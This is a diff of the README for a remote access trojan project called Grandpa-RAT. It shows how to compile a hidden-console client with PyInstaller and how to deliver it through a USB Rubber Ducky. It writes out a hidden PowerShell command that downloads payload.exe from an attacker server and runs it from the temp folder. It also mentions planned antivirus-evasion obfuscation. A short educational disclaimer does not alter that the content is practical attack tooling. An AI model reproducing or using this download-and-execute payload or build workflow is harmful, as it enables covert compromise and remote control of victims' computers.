grandpacltn/Grandpa-RAT-v2.0/README.md

 Copy
 Edit
 pyinstaller --onefile --noconsole rat_client.py
-EXE will be in the /dist folder

-🕵️ Obfuscation and AV evasion steps will be available in /build_tools/obfuscate.py (coming soon)
+The .exe will be created inside /dist/

+✅ Tip: Run it in a test VM and use your controller to manage the session.

-🧪 Rubber Ducky Delivery (USB)
+🧪 USB Rubber Ducky Payload
-Found in delivery/rubber_ducky_payload.txt.
-Load onto a Rubber Ducky or HID attack tool to automate:
+Found in delivery/rubber_ducky_payload.txt — this is a payload you can flash onto a Rubber Ducky or HID emulator:

 powershell
 Copy
 Edit
-powershell -w hidden -c "iwr http://yourserver/payload.exe -OutFile $env:temp\\rat.exe; Start-Process $env:temp\\rat.exe" 👨‍🔬 Legal Disclaimer
+powershell -w hidden -c "iwr http://yourserver/payload.exe -OutFile $env:temp\\rat.exe; Start-Process $env:temp\\rat.exe" 🔒 Legal Disclaimer
-This software is intended strictly for educational purposes and authorized penetration testing.
+This software is provided for educational purposes only.
-Do not deploy on unauthorized networks or systems.
+Unauthorized access to computer systems is illegal.
+Use only on systems you own or are authorized to test.
-The author assumes no responsibility for misuse or damage.
+The author assumes no responsibility for misuse.

-🧑‍💻 Author
+👨‍💻 Author
 Matthew Ogoh – Cybersecurity Specialist & Ethical Hacker
 GitHub: @grandpacltn
-Twitter: @cybergrandpa__
+Twitter: @cybergrandpa

-⭐ Show Some Love
+⭐ Star The Project
-If this project helped you learn, consider giving it a ⭐ on GitHub.
-Let's build safer systems and smarter hackers!
+If this helped you learn ethical hacking or inspired your own build, give it a ⭐ and share it with fellow learners!